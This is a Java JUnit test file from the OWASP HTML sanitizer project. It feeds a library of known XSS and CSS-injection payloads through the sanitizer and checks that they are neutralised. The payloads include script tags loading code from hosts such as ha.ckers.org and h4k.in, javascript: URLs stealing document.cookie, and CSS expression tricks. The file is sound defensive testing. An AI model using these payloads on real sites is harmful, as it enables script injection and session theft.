/* | |
* Copyright (c) 2007-2010, Arshan Dabirsiaghi, Jason Li | |
* | |
* All rights reserved. | |
* | |
* Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: | |
* | |
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. | |
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. | |
* Neither the name of OWASP nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. | |
* | |
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS | |
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT | |
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR | |
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR | |
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, | |
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, | |
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR | |
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF | |
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING | |
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS | |
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
*/ | |
package org.owasp.html; | |
import java.io.IOException; | |
import java.io.InputStreamReader; | |
import java.net.URL; | |
import java.net.URLConnection; | |
import java.util.regex.Matcher; | |
import java.util.regex.Pattern; | |
import org.apache.commons.codec.binary.Base64; | |
import junit.framework.AssertionFailedError; | |
import junit.framework.Test; | |
import junit.framework.TestCase; | |
import junit.framework.TestSuite; | |
/**
 * Runs the AntiSamy test inputs through {@link HtmlSanitizer} using the
 * policy assembled in {@code makePolicy}, which should be immune to XSS and
 * CSS phishing attacks.
 *
 * @author Arshan Dabirsiaghi
 *
 */
public class AntiSamyTest extends TestCase { | |
static final boolean RUN_KNOWN_FAILURES = false; | |
static final boolean DISABLE_INTERNETS = false; | |
private static HtmlSanitizer.Policy makePolicy(Appendable buffer) { | |
final HtmlStreamRenderer renderer = HtmlStreamRenderer.create( | |
buffer, | |
new Handler<IOException>() { | |
public void handle(IOException ex) { | |
AssertionFailedError failure = new AssertionFailedError(); | |
failure.initCause(ex); | |
throw failure; | |
} | |
}, | |
new Handler<String>() { | |
public void handle(String errorMessage) { | |
fail(errorMessage); | |
} | |
}); | |
return new HtmlPolicyBuilder() | |
.allowElements( | |
"a", "b", "br", "div", "font", "i", "img", "input", "li", | |
"ol", "p", "span", "td", "ul") | |
.allowAttributes("checked", "type").onElements("input") | |
.allowAttributes("color").onElements("font") | |
.allowAttributes("href").onElements("a") | |
.allowAttributes("src").onElements("img") | |
.allowAttributes("class", "id", "title").globally() | |
.allowAttributes("char").matching( | |
new AttributePolicy() { | |
public String apply( | |
String elementName, String attributeName, String value) { | |
return value.length() == 1 ? value : null; | |
} | |
}).onElements("td") | |
.allowStandardUrlProtocols() | |
.requireRelNofollowOnLinks() | |
.allowStyling() | |
.build(renderer); | |
} | |
private static String sanitize(String html) { | |
StringBuilder sb = new StringBuilder(); | |
HtmlSanitizer.sanitize(html, makePolicy(sb)); | |
return sb.toString(); | |
} | |
private static final String[] BASE64_BAD_XML_STRINGS = new String[] { | |
// The first entry is the Base64 encoding of
// "<a - href=\"http://www.owasp.org\">click here</a>".
"PGEgLSBocmVmPSJodHRwOi8vd3d3Lm93YXNwLm9yZyI+Y2xpY2sgaGVyZTwvYT4=", | |
// The remaining entries are randomly generated 300-byte sequences that
// trigger parser errors; the test decodes them into Strings.
"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", | |
}; | |
@Override | |
protected void setUp() throws Exception { | |
super.setUp(); | |
} | |
@Override | |
protected void tearDown() throws Exception { | |
super.tearDown(); | |
} | |
public static Test suite() { | |
TestSuite suite = new TestSuite(AntiSamyTest.class); | |
return suite; | |
} | |
public void testCompareSpeeds() throws Exception { | |
if (DISABLE_INTERNETS) { return; } | |
long totalTime = 0; | |
long averageTime = 0; | |
int testReps = 15; | |
for (String url : new String[] { | |
"http://slashdot.org/", "http://www.fark.com/", | |
"http://www.cnn.com/", "http://google.com/", | |
"http://www.microsoft.com/en/us/default.aspx", | |
"http://deadspin.com/", | |
}) { | |
URLConnection conn = new URL(url).openConnection(); | |
String ct = guessCharsetFromContentType(conn.getContentType()); | |
InputStreamReader in = new InputStreamReader(conn.getInputStream(), ct); | |
StringBuilder out = new StringBuilder(); | |
char[] buffer = new char[5000]; | |
int read = 0; | |
do { | |
read = in.read(buffer, 0, buffer.length); | |
if (read > 0) { | |
out.append(buffer, 0, read); | |
} | |
} while (read >= 0); | |
in.close(); | |
String html = out.toString(); | |
System.out.println("About to scan: " + url + " size: " + html.length()); | |
if (html.length() > 640000) { | |
System.out.println(" -Maximum input size 640000 exceeded. SKIPPING."); | |
continue; | |
} | |
long startTime = 0; | |
long endTime = 0; | |
for (int j = 0; j < testReps; j++) { | |
startTime = System.nanoTime(); | |
sanitize(html); | |
endTime = System.nanoTime(); | |
System.out.println( | |
" Took " + ((endTime - startTime) / 1000000) + " ms"); | |
totalTime = totalTime + (endTime - startTime); | |
} | |
averageTime = totalTime / testReps; | |
} | |
System.out.println("Total time ms: " + totalTime/1000000L); | |
System.out.println("Average time per rep ms: " + averageTime/1000000L); | |
} | |
/* | |
* Test basic XSS cases. | |
*/ | |
public void testScriptAttacks() throws Exception { | |
assertSanitizedDoesNotContain("test<script>alert(document.cookie)</script>", "script"); | |
assertSanitizedDoesNotContain("test<script>alert(document.cookie)</script>", "script"); | |
assertSanitizedDoesNotContain("<<<><<script src=http://fake-evil.ru/test.js>", "<script"); | |
assertSanitizedDoesNotContain("<<<><<script src=http://fake-evil.ru/test.js>", "<script"); | |
assertSanitizedDoesNotContain("<script<script src=http://fake-evil.ru/test.js>>", "<script"); | |
assertSanitizedDoesNotContain("<script<script src=http://fake-evil.ru/test.js>>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "onload"); | |
assertSanitizedDoesNotContain("<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "onload"); | |
assertSanitizedDoesNotContain("<BODY ONLOAD=alert('XSS')>", "alert"); | |
assertSanitizedDoesNotContain("<BODY ONLOAD=alert('XSS')>", "alert"); | |
assertSanitizedDoesNotContain("<iframe src=http://ha.ckers.org/scriptlet.html <", "<iframe"); | |
assertSanitizedDoesNotContain("<iframe src=http://ha.ckers.org/scriptlet.html <", "<iframe"); | |
assertSanitizedDoesNotContain("<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", "src"); | |
assertSanitizedDoesNotContain("<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", "src"); | |
assertSanitizedDoesNotContain("<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>", "alert"); | |
assertSanitizedDoesNotContain("<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>", "alert"); | |
} | |
public void testImgAttacks() throws Exception { | |
assertSanitizedDoesContain("<img src=\"http://www.myspace.com/img.gif\"/>", "<img"); | |
assertSanitizedDoesContain("<img src=\"http://www.myspace.com/img.gif\"/>", "<img"); | |
assertSanitizedDoesNotContain("<img src=javascript:alert(document.cookie)>", "<img"); | |
assertSanitizedDoesNotContain("<IMG SRC=javascript:alert('XSS')>", "<img"); | |
assertSanitizedDoesNotContain("<IMG SRC=javascript:alert('XSS')>", "<img"); | |
assertSanitizedDoesNotContain("<IMG SRC='javascript:alert('XSS')'>", "src"); | |
assertSanitizedDoesNotContain("<IMG SRC='javascript:alert('XSS')'>", "src"); | |
assertSanitizedDoesNotContain("<IMG SRC=\"jav
ascript:alert('XSS');\">", "alert"); | |
assertSanitizedDoesNotContain("<IMG SRC=\"jav
ascript:alert('XSS');\">", "alert"); | |
String s = "<IMG SRC=javascript:alert('XSS')>"; | |
if (sanitize(s).length() != 0) { | |
assertSanitizedDoesContain(s, "&"); | |
} | |
s = "<IMG SRC=javascript:alert('XSS')>"; | |
if (sanitize(s).length() != 0) { | |
assertSanitizedDoesContain(s, "&"); | |
} | |
sanitize("<IMG SRC=javascript:alert('XSS')>"); | |
sanitize("<IMG SRC=javascript:alert('XSS')>"); | |
assertSanitizedDoesNotContain("<IMG SRC=\"javascript:alert('XSS')\"", "javascript"); | |
assertSanitizedDoesNotContain("<IMG SRC=\"javascript:alert('XSS')\"", "javascript"); | |
assertSanitizedDoesNotContain("<IMG LOWSRC=\"javascript:alert('XSS')\">", "javascript"); | |
assertSanitizedDoesNotContain("<IMG LOWSRC=\"javascript:alert('XSS')\">", "javascript"); | |
assertSanitizedDoesNotContain("<BGSOUND SRC=\"javascript:alert('XSS');\">", "javascript"); | |
assertSanitizedDoesNotContain("<BGSOUND SRC=\"javascript:alert('XSS');\">", "javascript"); | |
} | |
public void testHrefAttacks() throws Exception { | |
assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", "href"); | |
assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", "href"); | |
assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", "href"); | |
assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", "href"); | |
assertSanitizedDoesNotContain("<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", "ha.ckers.org"); | |
assertSanitizedDoesNotContain("<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", "ha.ckers.org"); | |
assertSanitizedDoesNotContain("<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", "ha.ckers.org"); | |
assertSanitizedDoesNotContain("<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", "ha.ckers.org"); | |
assertSanitizedDoesNotContain("<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS", "javascript"); | |
assertSanitizedDoesNotContain("<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS", "javascript"); | |
assertSanitizedDoesNotContain("<IMG SRC='vbscript:msgbox(\"XSS\")'>", "vbscript"); | |
assertSanitizedDoesNotContain("<IMG SRC='vbscript:msgbox(\"XSS\")'>", "vbscript"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", "<meta"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", "<meta"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", "<meta"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", "<meta"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", "<meta"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", "<meta"); | |
assertSanitizedDoesNotContain("<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", "iframe"); | |
assertSanitizedDoesNotContain("<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", "iframe"); | |
assertSanitizedDoesNotContain("<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", "javascript"); | |
assertSanitizedDoesNotContain("<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", "javascript"); | |
assertSanitizedDoesNotContain("<TABLE BACKGROUND=\"javascript:alert('XSS')\">", "background"); | |
assertSanitizedDoesNotContain("<TABLE BACKGROUND=\"javascript:alert('XSS')\">", "background"); | |
assertSanitizedDoesNotContain("<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", "background"); | |
assertSanitizedDoesNotContain("<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", "background"); | |
assertSanitizedDoesNotContain("<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", "javascript"); | |
assertSanitizedDoesNotContain("<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", "javascript"); | |
assertSanitizedDoesNotContain("<DIV STYLE=\"width: expression(alert('XSS'));\">", "alert"); | |
assertSanitizedDoesNotContain("<DIV STYLE=\"width: expression(alert('XSS'));\">", "alert"); | |
assertSanitizedDoesNotContain("<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", "alert"); | |
assertSanitizedDoesNotContain("<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", "alert"); | |
assertSanitizedDoesNotContain("<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", "ript:alert"); | |
assertSanitizedDoesNotContain("<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", "ript:alert"); | |
assertSanitizedDoesNotContain("<BASE HREF=\"javascript:alert('XSS');//\">", "javascript"); | |
assertSanitizedDoesNotContain("<BASE HREF=\"javascript:alert('XSS');//\">", "javascript"); | |
assertSanitizedDoesNotContain("<BaSe hReF=\"http://arbitrary.com/\">", "<base"); | |
assertSanitizedDoesNotContain("<BaSe hReF=\"http://arbitrary.com/\">", "<base"); | |
assertSanitizedDoesNotContain("<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", "<object"); | |
assertSanitizedDoesNotContain("<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", "<object"); | |
assertSanitizedDoesNotContain("<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", "javascript"); | |
assertSanitizedDoesNotContain("<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", "javascript"); | |
assertSanitizedDoesNotContain("<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", "<embed"); | |
assertSanitizedDoesNotContain("<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", "<embed"); | |
assertSanitizedDoesNotContain("<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", "<embed"); | |
assertSanitizedDoesNotContain("<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", "<embed"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "script"); | |
assertSanitizedDoesNotContain("<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "script"); | |
assertSanitizedDoesNotContain("<SCRIPT SRC=http://ha.ckers.org/xss.js", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT SRC=http://ha.ckers.org/xss.js", "<script"); | |
assertSanitizedDoesNotContain("<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>", "style"); | |
assertSanitizedDoesNotContain("<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>", "style"); | |
assertSanitizedDoesNotContain("<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>", "aim.exe"); | |
assertSanitizedDoesNotContain("<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>", "aim.exe"); | |
assertSanitizedDoesNotContain("<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->", "javascript"); | |
assertSanitizedDoesNotContain("<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->", "javascript"); | |
assertSanitizedDoesNotContain("<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">", "document"); | |
assertSanitizedDoesNotContain("<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">", "document"); | |
} | |
/* | |
* Test CSS protections. | |
*/ | |
public void testCssAttacks() throws Exception { | |
assertSanitizedDoesNotContain("<div style=\"position:absolute\">", "position"); | |
assertSanitizedDoesNotContain("<div style=\"position:absolute\">", "position"); | |
assertSanitizedDoesNotContain("<style>b { position:absolute }</style>", "position"); | |
assertSanitizedDoesNotContain("<style>b { position:absolute }</style>", "position"); | |
assertSanitizedDoesNotContain("<div style=\"z-index:25\">test</div>", "z-index"); | |
assertSanitizedDoesNotContain("<div style=\"z-index:25\">test</div>", "z-index"); | |
assertSanitizedDoesNotContain("<style>z-index:25</style>", "z-index"); | |
assertSanitizedDoesNotContain("<style>z-index:25</style>", "z-index"); | |
} | |
/* | |
* Test a bunch of strings that have tweaked the XML parsing capabilities of | |
* NekoHTML. | |
*/ | |
public void testIllegalXML() throws Exception { | |
